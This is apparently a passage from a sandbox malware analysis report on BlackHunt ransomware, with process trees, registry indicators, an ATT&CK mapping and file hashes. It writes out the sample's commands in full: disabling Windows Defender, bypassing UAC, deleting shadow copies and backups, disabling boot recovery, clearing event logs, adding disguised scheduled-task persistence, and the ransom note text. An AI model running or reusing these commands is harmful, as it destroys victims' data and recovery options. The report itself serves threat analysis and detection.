2544 wrote to memory of 1772 2544 cmd.exe 55 PID 2664 wrote to memory of 772 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 56 PID 2664 wrote to memory of 772 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 56 PID 2664 wrote to memory of 772 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 56 PID 2664 wrote to memory of 772 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe"C:\Users\Admin\AppData\Local\Temp\9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2904
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1192
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe" /F2⤵PID:2424
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe" /F3⤵
- Creates scheduled task(s)
PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2016
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:516
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2352
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1684
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:892
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2368
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1700
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2388
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1736
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2892
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:228
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:232
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1644
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2388
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1340
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1764
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1556
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1504
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2312
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2572
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1012
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2840
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1820
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:960
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:220
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe"2⤵PID:2884
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2988
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2084
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2908
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b2e4d9f112ee126c0c2b705cfed32038
SHA19651ffd0a46f2029523bbb29b62a9006cc2832f2
SHA25669162752e38dbaf77ad36343a3a287b2dc57b06573477248f633cd865ce7351e
SHA5121532febbaf5689368a73756981e13a7a1b39244a4ad6e3a6801ef6e15e930e38839fe4900349596717d3c764660c695226bb709cb2cf114850f081fc238b69f6
-
Filesize
684B
MD50e06c19d4bb7f6746df532463819c93d
SHA194edaa6facf62ee4c2f1989cc39f5c9ca9db04a1
SHA256308432b375021cfdfc96d1c6dc3db208347fc0f753c35aaba16932fd07d1befe
SHA512eb2224d63a4dcafce00b720c053dd625fda36af37f4767bfcf43a8cc178ee2ab58dd91051e66da7888937ae22a45dcaf27f0b0ca463e67a5211b1e96dcafa5a4
-
Filesize
12KB
MD56f653cef13ed816ca323fdfe79ff46dc
SHA14d20410418a562ad632944aee66104d9d86a5119
SHA256cc93d6c094c51ce4fe1c6959f1511a36b9215aee38105dbbf4b779d69edfb75b
SHA512a24ff8fba08db2c051f44b1faea4410b74862a7ffa6501ea526f98f2eee535cde2a08b5387666cd63fbff514e4648e6a8db6185fc22bf9bcb4ad1d8ac2e0b175